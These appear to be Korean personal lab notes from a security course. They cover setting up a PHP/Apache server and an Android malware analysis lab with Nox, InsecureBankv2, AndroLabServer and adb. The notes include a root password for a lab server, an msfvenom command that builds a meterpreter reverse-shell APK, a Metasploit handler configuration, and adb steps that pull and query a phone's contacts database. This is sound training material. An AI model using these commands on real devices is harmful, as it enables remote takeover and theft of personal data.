산특관리서버 : https://192.168.0.252 (root, p@ssw0rd!@123) 192.168.0.24 / (22024.8024.21024) 192.168.0.100 20,21,80 apm 깔고 jyb.jeonjucom.kr(192.168.0.24) 뜨는지 확인 apt -y install php8.3-fpm오류(php -v 해보면 8.1 확인 가능) => 설정 전부 8.1로 바꿔주기 apt -y install php8.1-fpm a2enmod proxy_fcgi setenvif a2enconf php8.1-fpm systemctl restart php8.1-fpm apache2
nox 설치(어플리케이션) 안드로이드 악성코드 분석하기 0) 안드로이드용 악성코드 만들기(옵션 제거!!) msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.0.214 LPORT=4444 -o /home/kali/android.apk nano malware.rc user exploit/multi/handler set andriod windows/meterpreter/reverse_tcp set lhost 192.168.0.214 set lport 4444 exploit msfconsole -r malware.rc nox 에 ftp로 가져온 .apk(악성코드) 파일 설치 sz가 더 편함 1) Android-InsecureBankv2 설치 (가상은행 앱) https://sqlitebrowser.org/dl/ DB Browser for SQLite - Standard installer for 64-bit Windows 위치 /c:사용자\pc14\androlabserver\mydb.db db browser for sqlite로 분석 > user > 보기 > (dinesh/Dinesh@123$) or (jack/Jack@123$) tip!!! 로그인 안될 경우 powershell prompt 에서 ctrl + c 2) 아나콘다 이용하여 python 가상환경 만들기 [anaconda power shell prompt] cd .\AndroLabServer\ conda create -n py27 python=2.7 (2.7버전 설치) conda env list (설치 확인) conda activate py27 (base > py27로 변경 확인) #conda env remove -n py38 (삭제) pip install -r requirements.txt 자동으로 아래 등을 설치해줌 flask sqlalchemy simplejson web.py cherrypy... python app.py --help port 8888 확인 python app.py (접속대기) 3) 안드로이드 구조 분석하기 Android 디버그 브리지(adb) 설치 https://developer.android.com/tools/adb?hl=ko platform-tools-latest-windows.zip 다운로드 platform-tools-latest-windows.zip을 adb로 이름 변경 위치 /c:사용자\pc14\adb [cmd] cd /c:사용자\pc14\adb adb > 설명확인 adb connect 127.0.0.1:62001 (연결) adb shell (접속) adb pull /경로 /저장위치 adb pull /data/data/com.android.providers.contacts/databases/contacts2.db (주소록 가져오기) /data/data/com.android.providers.contacts/databases .db 보는 법 > sqlite3 contacts2.db (주소록) .tables (테이블 보기) select * from data; (data 테이블 내용 전부 보기) select * from phone_lookup; (테이블 내용 전부 보기;전화번호 확인) PRAGMA table_info(data); (data 테이블 목차 보기) PRAGMA table_info(phone_lookup); (phone_lookup 테이블 목차 보기)